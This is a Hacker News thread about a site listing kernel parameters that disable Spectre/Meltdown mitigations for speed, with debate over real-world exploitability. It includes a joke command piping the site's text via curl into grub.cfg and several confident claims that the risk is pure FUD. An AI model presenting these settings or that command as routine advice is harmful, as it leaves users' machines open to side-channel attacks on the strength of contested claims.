Show us a shred of evidence attacks via javascript are viable using these vulnerabilities.

I run ScriptBlock anyway, so it's even less of a concern for me.



I opened the first link. The description starts with.

    Enable `#shared-array-buffer` in `chrome:///flags` under your own risk...


Shared Array Buffers are enabled by default in Chrome now, because Chrome has separate mitigations against Spectre.

To the best of my knowledge, it does not have mitigations against Meltdown because it assumes those protections will be implemented at the OS/firmware level, but if anyone has more experience or insight than me on that front, they're welcome to correct me.

In any case, you're making a kind of wild assumption that the type of user who disables a security feature from their OS to get a speed increase won't also likely disable security features like Site Isolation in their browser when they hear that those features increase Chrome's memory usage by somewhere between 10-20%.


Cool. I wasn't aware Chrome re-enabled SABs, with mitigations.

https://github.com/tc39/ecma262/issues/1435


So there's a known exploit in CPUs and your response is "prove to me it can be exploited or I won't use mitigations"? In 2020 no less? What can you possibly be doing that would even notice the slowdown from these mitigations? Virtually everything we actually do will be bottlenecked by something else long before the CPU becomes an issue.


In my mind javascript is so many layers removed from machine code that it would be insanely hard to even break out of the chrome sandbox let alone glean anything useful from other running processes.

Practically speaking, what is possible?


You might want to google: 'javascript spectre exploit'.


That depends on high resolution times which have been disabled in all browsers. AFAIK.


There are variants of Spectre that do not require a high resolution timer. Here's some thoughts on working around browser mitigations: https://alephsecurity.com/2018/06/26/spectre-browser-query-c...


"We were not able use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The techinque presented here is potentially relevant even for this timer resolution, but some parameter tweaking is required.?"

AFAIK, Chrome's highest resolution is also in the ms range.

I have some thoughts, too, but thoughts don't amount to a working exploit. Show me a currently working exploit, that is in the open. As far as state actors developing such exploits, there are a ton of holes in that scenario at every layer in the stack.


Their PoC focused on Chrome. I would assume that "parameter tweaking" probably means "change some things to make it work but run slower".


HN wouldn't let me nest another response. This is in regards to "Timers aren't necessarily even a requirement"

<<you can busyloop and count iterations of that instead as a “timer”>>

Assuming you're the only job running on the CPU, which is not the case. Threads are not running continuously. But again, if there is a working exploit in the browser then show us. Talk is cheap.


I am aware that threads don't run continuously; scheduling just makes this worse just like timer jittering does. Sadly, I'm not the kind of person who can drop full, working exploits against unpatched browsers in response to Hacker News comments; I just have a passing interest in the field :(


performance.now resolution in Chrome is between 1 and 2 ms, I believe, with jitter. If they have a working POC for Chrome why not demonstrate the full exploit and force the Chromium team to rethink their mitigations? Lots of people talking possibilities but zero working exploits in the open. That's not a good ground for rational debate.


Timers aren't necessarily even a requirement to exploit Spectre: https://news.ycombinator.com/item?id=22831067. It's pretty hard to protect against this in general unless you generate retpolines.


I could show you an ubuntu root password dialog and you would type your password into it > 0% of the time.


These aren't GRUB parameters, they are kernel parameters.


Will these parameters work on a VM as well, or just a bare-metal host?

Edit: looks like "performance gained by disabling workarounds for the mostly Intel CPU security flaws are not all that impressive in all workloads": https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...


I think I/O heavy benchmarks would be much more useful as syscalls take the heaviest hit from the mitigations.


I mean, its pretty obvious that enabling an option named no_spectre_v1 (and v2) is going to disable spectre mitigation. I feel like nobody should act shocked by this.



Well you know it says `nospectre_v2 nospectre_v1`, they're not being exactly sneaky about it.


Except a random person might not know what these names refer to.


Is it relevant to AMD ryzen users?


The thing I would really like to figure out is how to prevent a Linux system from essentially livelocking when it close to runs out of memory. We've all seen it. Try to ssh in, connections get established but do not proceed. If you're lucky to have a console shell open from before, it shows gigantic load. Wish there was a way to put a few system critical processes into a container to guarantee them some resources.


Try a userspace oom. EarlyOOM has been a life saver for me, but there is a few others. AFAIK Fedora and Clear linux have begun shipping EarlyOOM by default.

nohang's README have a gist about other projects.

https://github.com/hakavlad/nohang



Thanks for that. Sure enough this was even on HN before :)

https://news.ycombinator.com/item?id=20620545


I've heard that is problem is caused by Linux's overcommitting strategy. Basically, initial memory allocation never fails (unless you set special flags), but no memory is actually allocated on the spot. Memory is only allocated when it is accessed. And if Linux runs out of memory when a program accessed a piece of yet to be allocated memory, it will try really _really_ hard to free up memory so that memory access can success.

That's what's causing the lock ups.

Sounds to me this would be difficult to fix without breaking backward compatibility.

In the mean time, you can probably improve your quality of life quite a bit by using something like: https://github.com/facebookincubator/oomd


It's more complex than that. Doing lazy allocation is not the problem, it's a common optimization. The problem comes when Linux does allow programs to (lazily) allocate a total amount of memory than is larger than the available RAM+SWAP before failing allocations. Then, when processes actually try to use that RAM, there is no physical place where to place that memory, and the only solution is to kill a process (OOM).

This may certainly seem stupid at first sight. I don't remember the exact reason why Linux does this, but I remember that it was said that not doing it would imply not using all available RAM efficiently and allocations would start failing before expected or something like that.

It's actually pretty easy to change this behaviour, there is a sysctl (/proc/sys/vm/overcommit_memory) that defaults to 0, but you can disable the overcommitting behaviour and even tune it. "2" does disable the entire overcommitting logic and it's what some people use to avoid memory trashing situations (but you still can get OOM in some situations IIRC) https://www.kernel.org/doc/html/latest/vm/overcommit-account...


Overcommit is needed when a large process fork-execs a smaller process. If overcommit is disabled then forking a large process will fail even if it would be safe in practice. A proper implementation of spawn() could fix this but that's not the Unix way.


Turning off overcommitting can break certain applications that relies on it. For example, the address sanitize allocates huge address spaces as shadow memory.

I do not think overcommitting is the problem. I believe the problem is Linux won't allow memory accesses to fail. It would stuck in a loop trying to free up memory, eventually triggers the oom killer.

It could have just let the memory access fail.


.. or swap?


or both!?


> Wish there was a way to put a few system critical processes into a container to guarantee them some resources.

There is, memcg is a thing, and it has both minimum free and maximum bounds. See the systemd.resource-control(5) man page, you can put important services in their own slice or use nspawn containers.

Personally I use nspawn containers for my web browsers, and set memory limits on them. This limits the live-lock behavior you're describing to just within the container. When firefox uses up all the memory, I see thrashing in the form of mostly executable pages being constantly evicted and faulted back in from disk, but the rest of the system stays responsive while the disk is hammered by the reads and some CPU burned while firefox spins its wheels.


This happens when the system is swapping and most processes are swapped out. Then in theory each context switch would need to swap in some pages first.

Not having given this much thought, I think some solutions could be: (a) Favor processes that are already swapped and keep them swapped in a bit longer before swapping in other processes. I.e. trade fairness for higher throughput. (b) Kill the worst offenders, EarlyOOM, etc, comes to mind. (c) Simply do not swap :)

I realize it's not a solution... But on my systems I simply have swapping disabled.


Killing the elephant in the room - the userspace low memory handler ability to gracefully handle low memory pressure https://www.reddit.com/r/linux/comments/ee6szk/killing_the_e... - The discussion was three months ago


Besides the userspace oom killers mentioned in sibling comments make sure to run the most recent kernels. This issue has gotten some attention lately and improvements for specific workloads have trickled in over several releases and will probably continue to do so. Additionally some of the userspace solutions rely on the fairly new /proc/pressure interface.


I did my own testing a while back, because I wanted to measure if these actually make a performance impact for my use case.

Net result: they do not. For my use case (Clojure/JVM and ClojureScript compilation), compile times did not get shorter. There seemed to be a slight improvement, but it was below the level of measuring noise (which was around 8%).

My conclusion was that while the system might indeed be faster by several percent, it is not measurable in my case, so I should not even bother, given the possible risks.


> Net result: they do not. For my use case (Clojure/JVM and ClojureScript compilation), compile times did not get shorter. There seemed to be a slight improvement, but it was below the level of measuring noise (which was around 8%).

I think the level of measuring noise is 0.5%, at least that is what low level system programmers generally consider as noise...


I don't think anyone else gets to say how much noise the GP saw in their test.


How can you know that information?


Compile times for my project are around 2m15s to 2m30s. Since this work involves lots of CPU (some single-threaded, some multi-threaded work) and I/O, the spread mentioned above is what I get with multiple measurements.

While it's true that without the mitigations times were much closer to the 2:15 mark, there were still outliers at 2:24. Which means it's hard to draw any meaningful conclusions.

Not sure where you got the "0.5%" figure from.


Nice work. Anyone claiming performance improvements without an accompanying benchmark that is relevant to your usecase is wasting your time.


My experience was different. My laptop boots in half the time with these mitigations disabled, and is noticeably much faster to use.


That's weird. I don't think anyone has measured these mitigations at a 50% perf hit even on crafted workloads. I wonder if something else is going on.


15% of pure cpu, but that doesn't take the consequences of the CPU improvement in other systems (e.g. crypto fs leading to higher iop rates, etc).


Running insecure performance enhancing kernel mods to speed up crypto fs....

It's a self defeating performance tip!


TBH there's different threat models there. A crypto fs makes sense if you're worried about a box getting stolen, while spectre/etc aren't a concern if you're running regular userland stuff on a single-user box.


same conclusion on the hardware i tested with


only mitigations=off is enough now. more information at

https://www.kernel.org/doc/html/latest/admin-guide/kernel-pa...

search for mitigations=


To clarify parent comment: if you understand the security risks and wish to turn off these mitigations, on modern kernels the entirety of the linked website's kernel args can be shortened to:

    mitigations=off
All of the rest is now redundant.

TIL: the default `mitigations` value, `auto`, leaves SMT enabled—even if it's vulnerable(!!!)—to avoid surprising sysadmins who upgrade to find SMT disabled. The full protection, non-default option is:

    mitigations=auto,nosmt
Thanks for the doc link!


>> the default `mitigations` value, `auto`, leaves SMT enabled—even if it's vulnerable(!!!)

Is SMT always vulnerable? Is there a way to only disable SMT if it's vulnerable on the target system?


To my knowledge it's always vulnerable on Intel processors, but not on AMD ones due to architectural differences. The nosmt option, when added to the mitigations option, should only disable SMT on vulnerable processors according to the Linux admin guide.


I let it because there were kernels with the no...=off flags but not mitigations=off yet.


That's insane. If you actually care about Linux performance so much, instead of poking security holes in your system, you might consider switching to Intel's Clear Linux (on AMD too) or (better yet) a performance-tuned kernel like XanMod:

https://www.phoronix.com/vr.php?view=28805


How is it insane? Dropping few lines in grub cfg is much easier than installing a whole new kernel


And dropping those lines of config is opening vulnerabilities on your system. In 2020, that's insane.


Doing a little research I came across this article (1) which explains what the flags are for:

(1) https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...


Promoting to disable the spectre mitigation should at least come with explanation and warning...


You're supposed to investigate those before you use them.


More broadly I am just wondering if this submitted link to 'Make Linux Fast Again' is just relevant. Let me explain:

- For tech savvy people, the boot options disabling the spectre mitigation are a very poor information as it takes 2 secs to find it with google. A 'rich' information would also consider the expected gains in terms or performance and the risks in terms of security, which might be the only matters for people who wonder if they should do it, assuming that making the change by itself is an easy and fast operation.

- For non tech savvy people, the boot options mean nothing at all, so they will not be able to benefit about the information as nothing is explained.

So if this submitted link is useless for both tech-savvy and non tech-savvy people, who is it intended to ? If it is intended and useful to no one, is it relevant ?


That’s why there’s no warning labels or disclaimers anywhere else in life right?


Windows version is here: (scroll down to where it says "Manage mitigations for CVE-2017-5715")

https://support.microsoft.com/en-us/help/4072698/windows-ser...


Will these modifications result in better performance on a non-server user install of Windows 10 Professional?


Here, run as admin and click disable, restart. https://www.grc.com/inspectre.htm


The irony here is that these mitigations were meant to save from potential threats that most desktop users will never be suspect to, yet people who want to get back the performance of the computers they paid for are going to attempt doing that by running programs that they have no idea what they are actually doing which is a more likely way for getting their systems infected than anything these mitigations would protect.

After all it is much easier to tell someone "here, click this as an admin to make your computer fast" and directly extract any data you want, than try and take advantage of all the issues the mitigations fix and the gamble that all the assumptions you are making will be correct.


A lot of people wouldn't read the source code anyway.


Yeah, we wouldn't want people to be do things they don't understand.

Maybe when people ask for clarity on a subject, we should give them reasons instead of saying things like "just dont".


Would be nice if grc could release the source for this tool so people could see what it queries/sets to function.


I thought this was going to be a replacement for all the free desktop crap for a minute. Now I’m disappointed.


The problem with this is that linux is no longer the OS. The browser is. And "modern" "browsers" do one thing, they automatically run arbitrary code from random places in a virtual machine. The very thing all these mitigations protect.


Yeah right, databases, app servers, network systems etc all run in a browser.


Serious question: In old Sandy Bridge days it was recommended to disable hyperthreading. That would decrease heat produced by CPU and allow better overclocking (2600k versus 2500k debate).

Are there some features in CPU (such as hyperthreading), I can disable, so I can run system without those workarounds? I think faster Linux kernel could offset slightly lower CPU performance. Also there is lower energy consumption on laptop...


On Intel: For some mitigations disabling hyperthreading will disable them as some vulnerabilities are only present with it enabled. That being said, the overall performance impact will be greater from disabling hyperthreading than by enabling the mitigations (though some vulnerabilities remain so long as you don't disable hyperthreading).

I wouldn't expect lower energy energy consumption from disabling hyperthreading: completing tasks faster allows the CPUs to reduce frequency faster.



There should be some disclosure that it will make it fast but very insecure


there is nospectre_v1 and nospectre_v2 written in there, unless you've been living under a rock you should get a pretty good idea that this is not a very safe thing to do.


It depends on your threat model.


yeah it looks great for air-gapped machines or if you've disabled the tcp/ip stack in the menuconfig AND can guarantee that nobody else ever has physical access to your machine


Yeah, "nobody else ever", might be a bit excessive.

Like, "oh shit grandpa is doing an elevation attack on the family computer again".


which depends on you even knowing your ever changing threat model. Known and Unknowns Unknowns are always present.


Could you go into detail on what you mean here?


You run a Hadoop/Spark cluster on-prem. It's isolated from the rest of the world. If foreign code is executing there, the game is already up. You turn `mitigations=off`.


Are you Jeff Bezos, Bill Gates, Tim Cook or other high profile billionaire or head of state target or work for such a target? If yes, do not do what the site says.

If not, it doesn't affect you.

Such security measures take into account possibility, but usually ignore probability.


> If not, it doesn't affect you.

I don't think I agree. Instead, I'd rephrase: "Do you ever use your web browser on this computer to go to less-than-trustworthy sites? Ones that use ad networks or load a cryptominer? Then you may not want to turn these on."

The risk for most individuals isn't that they'll be held ransom, rather their property will be abused and they'll have to repair it.


What do you believe is going to happen if you visit a less-than-trustworthy site? For a drive-by exploit to work (assuming there is one, just because a site is "shady" it doesn't mean it will be 100% sure that it will try to infect your computer with something) it will need to make a TON of assumptions about your setup and chances are (here again the probability that security types ignore) you wont be affected.

And really those issues should be solved at the browser level not the OS level level that affects every single application that runs on it. And AFAIK they already are.

I do not want my compiler or game or renderer or whatever else to certainly become slower just because someone may visit a site that may have an infected ad that may match an exploit their browser may have and may manage to extract some information that may be useful for whoever wrote the exploit (assuming they even manage to get that info back).

Also a cryptominer will only work for as long as you have the site open, of all the things that could go wrong, this is the most benign one.


> And really those issues should be solved at the browser level not the OS level level that affects every single application that runs on it.

They aren't -- this is exploitable in the browser if not patched at the OS level.

> For a drive-by exploit to work (assuming there is one, just because a site is "shady" it doesn't mean it will be 100% sure that it will try to infect your computer with something) it will need to make a TON of assumptions about your setup

If you run these on an ad network, you get access to millions of different setups - you don't need to make any assumptions, you're virtually guaranteed to find someone with a vulnerable setup.


Yes, but the chances are very low that the someone is you if you're using a recent browser version (I'd say not cutting edge, but recent). Probably far, far lower if you use uBO or similar. On Linux, at home, they're probably infinitesimal unless you're being targeted.


Mostly FUD. It's not really exploitable in a practical real world sense. Show me the exploit that can read my password or SSH key, and not some fixed set of data that's been staged by the PoC.


The problem is, without using all mitigation, at all times you /may/ have been exploited. So every time your system acts weird, you'll have that extra doubt. And can it can be pretty difficult to get remove a sophisticated exploit. I could see a sophisticated exploit network probing, tagging and targeting different exploits, for profit or just for fun. Probably not worth the risk for "most" people.


Are there any live exploits detected for Meltdown or Spectre? When talking about these vulnerabilities people seem to forget that these are pretty costly attacks: complex, slow (iirc at most you can read memory at 5kB/s) and require targeting to specific memory locations/software/etc. Why would an ad network or a cryptominer invest in such an attack when "Click here to download more RAM" still works?


There aren’t even POCs that work on modern browsers. These things are real on the cloud server level but it’s exploitability on the desktop/laptop level is over stated. Much easier vectors.


There's a lot of FUD going on. You're correct in that _many_ speculative execution attacks in general are very difficult to exploit in a useful way. I.e. things like timing side-channels using shared TLDs or in a hyper-threaded core.

The Meltdown attack (also a speculative execution attack) is a much bigger deal - it's easy to exploit, and an attacker could basically read arbitrary memory on your system. It is easier to mitigate, too, with KPTI. Before KPTI, your OS kept the full set of kernel page tables mapped when user processes are running, the contents of which could be exfiltrated using the speculative execution side-channel.

AMD processors (and I believe newer Intel processors) are basically immune to Meltdown, so it may be safe for you to turn off KPTI for a (minor) performance boost. Having said that, newer CPU TLBs have process-context IDs that let the OS make up for some of the performance impact, so you might not notice a difference at all.

The original "Spectre" attack (name in the whitepaper - not to be confused with the greater class of Spectre attacks) allowed out-of-bounds memory access within a process' address space via speculative execution. So, if your browser was running in a single process, then some Javascript could read other browser memory containing things like passwords, keys, etc. If your browser is running scripts or pages in their own sandboxed process, then the risk is pretty low.

Any Spectre mitigations performed by the kernel are not going to be a silver bullet, anyhow. These are _mitigations_, not "magic Spectre attack prevention" features. Unless out-of-order execution (or caches!) is eliminated entirely, speculative execution attacks are going to be a threat. (Interestingly, Itanium CPUs and it's VLIW architecture appears to be immune to these attacks.)

Even compiling your software with Spectre mitigations turned on (available in MSVC, not sure if GCC has implemented it yet) doesn't do a whole lot of magic - it will insert a serializing instruction (LFENCE on x86-64) to clear out the pipeline during certain loop-branch combinations, ensuring that a speculative read can't occur before the outcome of the branch is decided.

Any time there are shared resources between processes, CPUs, computers, datacenters, etc. there is a side-channel - period. What can be leaked via this side-channel, how noisy the side-channel is, what the rate of data exfiltration is, these are things under our control, but eliminating side-channels entirely is a fool's errand.

So, would I risk turning off the Spectre mitigations? I'll put it this way: I'd worry about the Spectre kernel flags after I had a Linux antivirus program installed, and turned on and tightened up my AppArmor or SELinux configs.

I'm sure many of the people crying out against the crime of disabling Spectre mitigations haven't done that yet (just like I haven't) - because it's a PITA! So, if you disable the mitigations and decide the performance increase is worth the risk, I wouldn't fault you for it.

The whole reason these exploits exist in the first place is because the CPU performance increases available with speculative execution, out-of-order execution, deep CPU pipelines was worth the risk (to their reputation, at least). I don't see a lot of people going back to buy Itaniums because they're worried about Spectre attacks.

Now - would I turn off KPTI? On an AMD CPU, sure. On Intel (unless you've double checked, the CPU was produced in the last couple of years, and it's immune to Meltdown) - ABSOLUTELY NOT!


Well, if you have an idea what to do with the undocumented string returned by the site, maybe you also have an idea of what effects it might have, beyond making linux fast again?



Important quotes:

> You are (probably) an adult. You can and should wisely decide just how much risk you are willing to take. Do or don't try this at home. You do not want to try this at work.

> As the above charts show: The effect of default parameters vs mitigations=off is measurable but not hugely impressive. (…)


> You can and should wisely decide just how much risk you are willing to take

That requires informed consent. But we can see that people are not well informed: many don't realize that a web broswer or an attacker accessible network stack are attack vectors.

I've been using these options for a while (well, mitigations=off is new to me)... on dedicated rendering computers that are on a port isolated network inaccessible to the internet and without the ability to make outgoing connections at all.

That's probably (I hope?) a reasonable usecase for these settings... but not exactly a super common one.


If someone suggests something I am not taking it seriously without good explanations.


If one uses these flags without understanding exactly what they mean, then one deserves whatever painful experience they may encounter.


What pain, no exploits have ever been documented. These mitigations are makeshift insurance for datacentres.


The operative word in my sentence is "may," indicating a level of uncertainty.


You can download PoCs from GitHub right now.


I've yet to see reports of one running involuntarily in the wild.


Probably because most systems quickly adopted mitigations and attackers then moved back to lower-hanging fruit.


So you are saying the anti-vaxxers of the linux world are protected by herd immunity? Interesting angle for sure!


I'm truly shocked by the comments I'm seeing here. When did so many people forget everything we've learned about security? You know what a zero-day attack is right? You know how fast those can cover the whole internet these days right? So why would you purposely leave a gaping security hole in your system to get some performance on a CPU that's probably too fast for your realistic workload already?


I've never seen reports indicating any exploit running involuntarily in the wild, ever.

That fact, however, does not validate my position.


"I've yet to see a horse run out, so why would I bolt this barn door?"


It's a special type of horse that won't run out unless aliens from another galaxy throw space hay at the door.


In March of 2019 there were no world wide pandemics forcing hundreds of millions to shelter in place.

The point is you vaccinate before a illness starts spreading if you can, because things spread quickly when you do not and can create quite a mess.


These academic PoCs read data that they themselves have staged during execution. This is very different from reading arbitrary, random memory that contains something like a cookie for another web site, password, or SSH key. When someone is looking for a real world exploit, this is what they want.


I don't think anyone has actually bothered to a microarchitectural side channel in practice yet.


Does anyone know a benchmarking utility that can quantify the impact of these mitigations? I mean I don't do much CPU bound work like heavy compiling on my machine, but I would nevertheless be interested in seeing what the effect is.


I guess you can use phoronix test suite: https://www.phoronix-test-suite.com

Those migrations are benchmarked quite frequently on phoronix.com, for example: https://www.phoronix.com/scan.php?page=article&item=3900x-99...


The phoronix.com site has ran several benchmarks with these mitigations on and off.


Is this needed for AMD based machines


You can run the Phoronix test suite before and after enabling them. There's not a lot of data on the various recent AMD platforms, presumably because of the smaller market share especially until recently. I imagine there's a large difference between mitigations=on and mitigations=off on the pre-Zen AMD platforms and a smaller difference between the two on the most recent AMD generation.


Excellent, thanks! I have a box where literally the only thing I care about is CPU speed (build cluster) and nothing on that box is worth anything at all.


I'm saying this lightly, but in some cases malware starts with boxes where nothing in them are worth anything at all, where CPU speed and an Internet connection are tools for botnets.


Fortunately, neither Spectre nor Meltdown allow write access of any kind.


At least until it reads credentials out of memory.


Build clusters almost always run in a local network without internet connection. Or with connections to specific hosts.


What about the thing you're building ?


For what it's worth, I tried this on my home server and load average remains at 0.00 0.00 0.00 when the machine is doing nothing. That is perhaps understandable, but before I enabled mitigations=off, it was always at some kind of a load, e.g. 0.07 or so.


How much of a difference will these make? Trying to decide if it's worth my time.


I did this on my i5 4300U laptop and whilst I didnt formally benchmark it, the boot time halved, and it feels a LOT faster to use. So much snappier.


Considering it takes all of 15 seconds to setup (5 minutes including reading), it's really not a matter of if it's worth your time, but if it's worth the risk, since it disables mitigations for hardware vulnerabilities.


I don't think there's an easy answer. It will very much depend on your hardware and what kind of software you run. I'd say the best way to tell is just to try it, measure performance, and compare results.


first, do you use js?


You make it sound as if JS was the only attack surface, whereas it's just the most common one.


I did not get that impression at all from that comment, FWIW.


Make Linux Vulnerable Again.


Are there any javascript exploits, on desktop, of these?


Spectre v2, possibly?


a.k.a Make Linux Unsafe Again.


Is there any public PoC that can exploit an Intel or AMD system with mitigations=off? And if so, what kind of access is needed?


Would be good with some context on motivation and impact. Some of these are specific to x86, for example.


I suggest adding a quick paragraph explanation, at first I thought that the server had been hugged to death

Thanks for this


What kind of performance gains would an AMD Zen2 system receive from disabling all of these mitigations?


If I disable these fixes, how likely (how much effort?) it is that somebody would make use of these vulnerabilities?

AFAIK, I (my personal workstation) would only be exposed via browser JS so if I do not spend too much time on shady sites, I should be good?


Basically: If you're fine with every program running on the system (including web browser in your case) having full, unfettered access to everything else on the system, then it's fine to disable the fixes.

In other words: Only do this on systems where you actually trust each running program not to be compromised in its day-to-day operations and turn against you. Anything that runs arbitrary code from an outside source (for example JS) is not safe.


And yet, with all of the pearl-clutching in this thread and countless others just like it, nobody seems to be able to point to any real-world exploits.

The threat is purely theoretical. The loss in performance is not.


As tsimionescu points out, it's only read access. But to go further, in most Unix systems, the default is already to give most users read access to almost everything: default masks in the filesystem tend to be 755, and when it comes to inspecting data from other users, there's an awful lot you can figure out by default. Leaving aside the fact that many home computers are single-user in practice anyways.


> having full, unfettered access to everything else on the system, then it's fine to disable the fixes.

You should say READ access. There is no risk of write access with Spectre or Meltdown.


I trust all of my programs as I use either only open-source or "big-player" packages. The only problem would seem to be JS from shady websites.

I guess now the question is, how much time to I have to spend on that site before it can get my private ssh keys?


The JavaScript of shady adverts that sometimes pop through can also occur on no. Shady websites. So you are not entirely safe by only browsing safe sites.


That doesn't answer the question, of course; it's just a sales pitch for the proverbial tiger-proof rock. To reiterate: how long does s/he have to spend on a shady site before a successful SPECTRE exploit takes place?

If this were actually happening in the real world, maybe we'd know.

But it's not, so we don't, and life goes on.

Albeit slowly.


There are ready-made Spectre exploits that will attack your browser if it hasn’t been hardened yet; these kinds of exploits are fairly straightforward. Spectre v2 is harder to pull off, but can reach across processes and so you’re presumably vulnerable to that.


Do you trust the sites you visit not to be compromised by shady ad networks, shady individuals, etc.?


Yes, a lot of these mitigations have demoscene on github so you can run an exploit locally.


noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off


mds=off

Does this mitigate MDS attacks?

https://mdsattacks.com/


Is there anything like this for macOS (for systems that do not run any untrusted code/scripts or are not internet connected, of course)?


There might be some under 'sysctl -a'.


because you can doesn't mean you should


Amazing that a 'website' like this can make the top page. Just a plain un-styled string of, presumably, some sort of configuration. No explanation on how to use it, or what it does.

I see 'specter' in there so there's a clue. I mean, after reading comments/ googling/ etc. I understand now, but at first I thought the site was broken.

Wouldn't it have been better to post an actual write up that explains what this is? We are setting the bar really low here :)


I see is as a sort of expertise threshold. It's not for you if you don't get it, but if you do there's lots to discuss. It's what relevance used to be without marketing.


Haha, I suppose that is what they were going for. I'll admit it's not for me. I definitely don't go poking around in my GRUB config very often, but, after reading the write ups others have posted, I did learn some new things, so there's that.

From other commenters:

https://linuxreviews.org/HOWTO_make_Linux_run_blazing_fast_(...

https://www.kernel.org/doc/html/latest/admin-guide/kernel-pa...


I guess the shocking simplicity is part of the appeal


I'm the author - the idea was, that you would be able to do

    curl -s https://make-linux-fast-again.com | awk '{ print "GRUB_CMDLINE_LINUX_DEFAULT=\"" $0 "\"" }' >> grub.cfg
to use the parameters directly (it's a joke ! don't !), which would not be possible if there was any other content on the webpage (at least without taking more than the 2 minutes this joke took to set up)


To late, I just blindly pasted that in my terminal and ran it :p

OK cool. Thanks for the explanation, that makes sense why it's empty then!

I definitely didn't get it. I take back what I said :) It did lead me to poking around the Linux kernel docs so that's not a bad way to start the day!


[flagged]


I think it's a meant to be tongue in cheek. However I agree that "Make $object $adjective again" is inextricably linked to the Trump campaign, so if anyone is using it I hope they realise that they'll be either be thought of as right-wingers or satirists by much of their audience.


as the owner of that DNS, I sure hope most people in the position of stumbling on it recognize the naming as eye-catching satire :)


I guessed that was the case for you, but I've seen the phrase used in a few other places and I have a feeling many are not as self-aware :-)


Well, that would be evidence that it is quite extricably linked to the Trump campaign.

There is prior art for campaign slogans escaping the political world and transcending their original partisan meanings. "A chicken in every pot", "Don't Mess with Texas" ("slogan that began as anti-littering campaign; later adopted for political and other purposes" - Wikipedia), etc. Wikipedia also suggests it has been used prior to Trump, including by both Bill and Hillary Clinton (https://en.wikipedia.org/wiki/Make_America_Great_Again ).


This reads like flamebait to me. I don't see that it adds anything to the discussion.


It's a relevant comment. The author chose a title with heavy ties to politics. They shouldn't then be surprised when people bring that up in discussion. I personally also think it's not wise to choose a title that enforces a slogan with ties to hateful politics unless that was your goal from the start.


All political slogans have ties to politics which someone finds hateful.


This is silly to say. Why deliberately miss the point?

"Finding" some hateful is not the same as being on the receiving end of types of hate that have caused a lot of violence and persecution over centuries.


Very simply, the slogan is not hateful. That you have rationalizations for finding it so doesn't change this fact.


Like I said earlier, why deliberately miss the point? "Make America Great Again" is a hateful slogan. You're purposely denying that to try to prove some point.


No, I'm simply stating a fact. There is no reason for you to presume motive. You have chosen to perceive the slogan as hateful. This is your belief, your perception. It's not present in the slogan itself.


It's not a "fact." But really, if you truly think that there is no hate in that slogan, then there's no point having this conversation, because I know what kind of person you are.


Thank you for acknowledging my ability to look beyond partisan biases.


Learn to take a joke.


While it might be straying slightly towards the off-topic, the second part is a very astute observation and an interesting connection that I did not personally make at first glance.


This is the same mindset that led the MAGA people to shut down the pandemics response team.


Please don't post political flamebait to HN. It leads nowhere good.

https://news.ycombinator.com/newsguidelines.html


Or, you can use AMD.


AMD has speculative side channels as well…


Linux 2020! :-D


Or use AMD....


Spectre mitigations are applied for both Intel and AMD.


Only partly

> Based on external and internal analysis, AMD believes it is not vulnerable to the SWAPGS variant attacks because AMD products are designed not to speculate on the new GS value following a speculative SWAPGS. For the attack that is not a SWAPGS variant, the mitigation is to implement our existing recommendations for Spectre variant 1.

https://www.amd.com/en/corporate/product-security


Most of the Spectre variants do affect AMD as well, however.


some mitigations are also applied to AMD Zen2. A benchmark on Phoronix showed a cost between 15% and 5% of performances.


AMD only just now released laptop CPUs that can compete with intel.


What has that got to do with anything?


There was no incentive go to with AMD so now a ton of people want their Intel performance back instead of buying a new PC. Heck, this also applies to FX CPUs.



This has some serious "I disabled my password to make logging in easier, but I'm still safe because the hacker would have to guess my username" vibes to it.


Unless you're doing it on a computer completely off any network and doesn't have any form of communication with the outside world, that's a very bad idea.

Edit: Ok, plenty of people already said things in that context already apparently...


I did this on my laptop a few months ago. It was like getting a new computer. I haven't benchmarked it, but boot time halved and it felt much faster to use.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: